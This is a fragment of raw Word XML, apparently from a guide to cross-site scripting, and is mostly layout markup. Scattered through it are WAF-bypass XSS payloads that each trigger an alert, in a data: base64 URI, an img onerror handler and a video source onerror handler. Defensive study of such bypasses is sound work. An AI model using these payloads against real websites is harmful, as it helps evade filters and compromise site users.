                            <a:gd name="T31" fmla="*/ 204 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 208 180"/>
                            <a:gd name="T35" fmla="*/ 208 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 229 180"/>
                            <a:gd name="T39" fmla="*/ 22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26679" id="Freeform 173" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:9pt;width:2.45pt;height:2.45pt;z-index:1597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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,145415;13335,145415;11430,144780;0,132080;0,127635;13335,114300;17780,114300;31115,129540;31115,132080;17780,145415" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>through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WAF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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack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conducted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certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pP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27968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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3850005" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="169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0005" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="6063" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="170" name="Freeform 172"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="6063" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7656 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6063"/>
                              <a:gd name="T2" fmla="+- 0 435 252"/>
                              <a:gd name="T3" fmla="*/ 435 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6063"/>
                              <a:gd name="T6" fmla="+- 0 435 252"/>
                              <a:gd name="T7" fmla="*/ 435 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6063"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6063"/>
                              <a:gd name="T14" fmla="+- 0 414 252"/>
                              <a:gd name="T15" fmla="*/ 414 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6063"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6063"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6063"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7656 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6063"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7677 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6063"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7677 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6063"/>
                              <a:gd name="T38" fmla="+- 0 414 252"/>
                              <a:gd name="T39" fmla="*/ 414 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7659 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6063"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7656 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6063"/>
                              <a:gd name="T46" fmla="+- 0 435 252"/>
                              <a:gd name="T47" fmla="*/ 43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063" h="183">
                                <a:moveTo>
                                  <a:pt x="6042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042" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6063" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6063" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6045" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6042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1614" y="252"/>
                            <a:ext cx="606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6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/?param=&lt;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data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=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0" o:spid="_x0000_s2178" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:303.15pt;height:9.15pt;z-index:-15488512;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="6063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">
                <v:shape id="Freeform 172" o:spid="_x0000_s2179" style="position:absolute;left:1614;top:252;width:6063;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6063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EzccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzU7DMBCE70i8g7WVuCDq8NOCQt0qRURCgksLD7CK&#10;lzg0Xke2SVOenj0gcdvVzM58u9pMvlcjxdQFNnA9L0ARN8F23Br4eK+vHkCljGyxD0wGTpRgsz4/&#10;W2Fpw5F3NO5zqySEU4kGXM5DqXVqHHlM8zAQi/YZoscsa2y1jXiUcN/rm6JYao8dS4PDgZ4cNYf9&#10;tzdQbV8XP27xFesqPV++3W11fXsajbmYTdUjqExT/jf/Xb9Ywb8XfHlGJt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0iBM3HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m6042,183l21,183r-3,-1l,162r,-4l,21,21,,6042,r21,21l6063,162r-18,20l6042,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6042,435;21,435;18,434;0,414;0,410;0,273;21,252;6042,252;6063,273;6063,414;6045,434;6042,435" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 171" o:spid="_x0000_s2180" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:6063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HCc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v5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SHCc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6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/?param=&lt;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data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=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10"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ByPass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Strings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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/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2848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200025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="168" name="Freeform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363 315"/>
                            <a:gd name="T3" fmla="*/ 363 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 363 315"/>
                            <a:gd name="T7" fmla="*/ 363 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 363 315"/>
                            <a:gd name="T11" fmla="*/ 363 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 342 315"/>
                            <a:gd name="T15" fmla="*/ 342 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 336 315"/>
                            <a:gd name="T19" fmla="*/ 336 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 315 315"/>
                            <a:gd name="T23" fmla="*/ 315 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 315 315"/>
                            <a:gd name="T27" fmla="*/ 315 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 339 315"/>
                            <a:gd name="T31" fmla="*/ 339 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 342 315"/>
                            <a:gd name="T35" fmla="*/ 342 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 363 315"/>
                            <a:gd name="T39" fmla="*/ 363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80EBC" id="Freeform 169" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:15.75pt;width:2.45pt;height:2.45pt;z-index:-1548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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,230505;13335,230505;11430,230505;0,217170;0,213360;13335,200025;17780,200025;31115,215265;31115,217170;17780,23050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2899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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3842385" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="165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42385" cy="116205"/>
                          <a:chOff x="1930" y="242"/>
                          <a:chExt cx="6051" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="166" name="Freeform 168"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="241"/>
                            <a:ext cx="6051" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7960 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 6051"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 6051"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 6051"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 6051"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 6051"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 6051"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 6051"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7960 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 6051"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7981 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 6051"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7981 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 6051"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7963 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 6051"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7960 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 6051"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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051" h="183">
                                <a:moveTo>
                                  <a:pt x="603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030" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6051" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6051" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6033" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="603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241"/>
                            <a:ext cx="605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src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onerror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"javascript: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window.onerror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alert;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throw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XSS"&gt;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6" o:spid="_x0000_s2181" style="position:absolute;margin-left:96.5pt;margin-top:12.1pt;width:302.55pt;height:9.15pt;z-index:-15487488;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,242" coordsize="605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">
                <v:shape id="Freeform 168" o:spid="_x0000_s2182" style="position:absolute;left:1930;top:241;width:6051;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="605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CHVsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP0YrCMBB8F+4fwh74pqmH1qNnlOPgQFAQq/i8NGtb&#10;bDYlSbX+vREE32Z3dmZ2FqveNOJKzteWFUzGCQjiwuqaSwXHw//oG4QPyBoby6TgTh5Wy4/BAjNt&#10;b7ynax5KEU3YZ6igCqHNpPRFRQb92LbEkTtbZzDE0ZVSO7xFc9PIryRJpcGaY0KFLf1VVFzyzig4&#10;7brp9t4d1tIlG+rDcTbfTFqlhp/97w+IEFfv45d6reP7aQrPMhGB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AIdWwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m6030,182l21,182r-3,-1l,161r,-3l,21,21,,6030,r21,21l6051,161r-18,20l6030,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6030,424;21,424;18,423;0,403;0,400;0,263;21,242;6030,242;6051,263;6051,403;6033,423;6030,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 167" o:spid="_x0000_s2183" type="#_x0000_t202" style="position:absolute;left:1930;top:241;width:605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gsO8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0zE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6Cw7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src</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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x</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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onerror</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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"javascript:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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window.onerror</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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alert;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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throw</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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XSS"&gt;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2950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415925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="164" name="Freeform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704 655"/>
                            <a:gd name="T3" fmla="*/ 704 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 704 655"/>
                            <a:gd name="T7" fmla="*/ 704 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 703 655"/>
                            <a:gd name="T11" fmla="*/ 703 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 682 655"/>
                            <a:gd name="T15" fmla="*/ 682 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 676 655"/>
                            <a:gd name="T19" fmla="*/ 676 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 655 655"/>
                            <a:gd name="T23" fmla="*/ 655 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 655 655"/>
                            <a:gd name="T27" fmla="*/ 655 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 679 655"/>
                            <a:gd name="T31" fmla="*/ 679 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 682 655"/>
                            <a:gd name="T35" fmla="*/ 682 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 704 655"/>
                            <a:gd name="T39" fmla="*/ 704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AA624" id="Freeform 165" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:32.75pt;width:2.45pt;height:2.45pt;z-index:-1548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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,447040;13335,447040;11430,446405;0,433070;0,429260;13335,415925;17780,415925;31115,431165;31115,433070;17780,44704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3001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369570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2823845" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="161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3845" cy="116205"/>
                          <a:chOff x="1930" y="582"/>
                          <a:chExt cx="4447" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="162" name="Freeform 164"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="582"/>
                            <a:ext cx="4447" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6356 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4447"/>
                              <a:gd name="T2" fmla="+- 0 764 582"/>
                              <a:gd name="T3" fmla="*/ 764 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4447"/>
                              <a:gd name="T6" fmla="+- 0 764 582"/>
                              <a:gd name="T7" fmla="*/ 764 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4447"/>
                              <a:gd name="T10" fmla="+- 0 764 582"/>
                              <a:gd name="T11" fmla="*/ 764 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4447"/>
                              <a:gd name="T14" fmla="+- 0 743 582"/>
                              <a:gd name="T15" fmla="*/ 743 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4447"/>
                              <a:gd name="T18" fmla="+- 0 740 582"/>
                              <a:gd name="T19" fmla="*/ 740 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4447"/>
                              <a:gd name="T22" fmla="+- 0 603 582"/>
                              <a:gd name="T23" fmla="*/ 603 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4447"/>
                              <a:gd name="T26" fmla="+- 0 582 582"/>
                              <a:gd name="T27" fmla="*/ 582 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6356 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4447"/>
                              <a:gd name="T30" fmla="+- 0 582 582"/>
                              <a:gd name="T31" fmla="*/ 582 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6377 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4447"/>
                              <a:gd name="T34" fmla="+- 0 603 582"/>
                              <a:gd name="T35" fmla="*/ 603 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6377 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4447"/>
                              <a:gd name="T38" fmla="+- 0 743 582"/>
                              <a:gd name="T39" fmla="*/ 743 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6359 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4447"/>
                              <a:gd name="T42" fmla="+- 0 764 582"/>
                              <a:gd name="T43" fmla="*/ 764 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6356 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4447"/>
                              <a:gd name="T46" fmla="+- 0 764 582"/>
                              <a:gd name="T47" fmla="*/ 76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447" h="183">
                                <a:moveTo>
                                  <a:pt x="442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426" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4447" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4447" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4429" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442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82"/>
                            <a:ext cx="444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&lt;Video&gt;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4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&lt;source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4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onerror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4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3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"javascript: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4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alert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4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(XSS)"&gt;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2" o:spid="_x0000_s2184" style="position:absolute;margin-left:96.5pt;margin-top:29.1pt;width:222.35pt;height:9.15pt;z-index:-15486464;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,582" coordsize="444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">
                <v:shape id="Freeform 164" o:spid="_x0000_s2185" style="position:absolute;left:1930;top:582;width:4447;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="444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UWsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0Pywi9iG6aWh/RVdpC0VPBRMTjmB2T&#10;0OxsyG417a/vFgRv8/E9Z7nuTC0u1LrKsoKnUQSCOLe64kLBPvsYzkA4j6yxtkwKfsjBevXQW2Ki&#10;7ZV3dEl9IUIIuwQVlN43iZQuL8mgG9mGOHBn2xr0AbaF1C1eQ7ipZRxFE2mw4tBQYkPvJeVf6bdR&#10;MD+On4+fY/2bbuJTPj28NdkgfVHqsd+9LkB46vxdfHNvdZg/ieH/mXCB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ZhRaxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4426,182l21,182r-3,l,161r,-3l,21,21,,4426,r21,21l4447,161r-18,21l4426,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4426,764;21,764;18,764;0,743;0,740;0,603;21,582;4426,582;4447,603;4447,743;4429,764;4426,764" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 163" o:spid="_x0000_s2186" type="#_x0000_t202" style="position:absolute;left:1930;top:582;width:444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qOM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0yo4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&lt;Video&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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&lt;source</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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onerror</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-13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"javascript:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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alert</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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(XSS)"&gt;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3052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639445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="160" name="Freeform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056 1007"/>
                            <a:gd name="T3" fmla="*/ 1056 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1056 1007"/>
                            <a:gd name="T7" fmla="*/ 1056 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
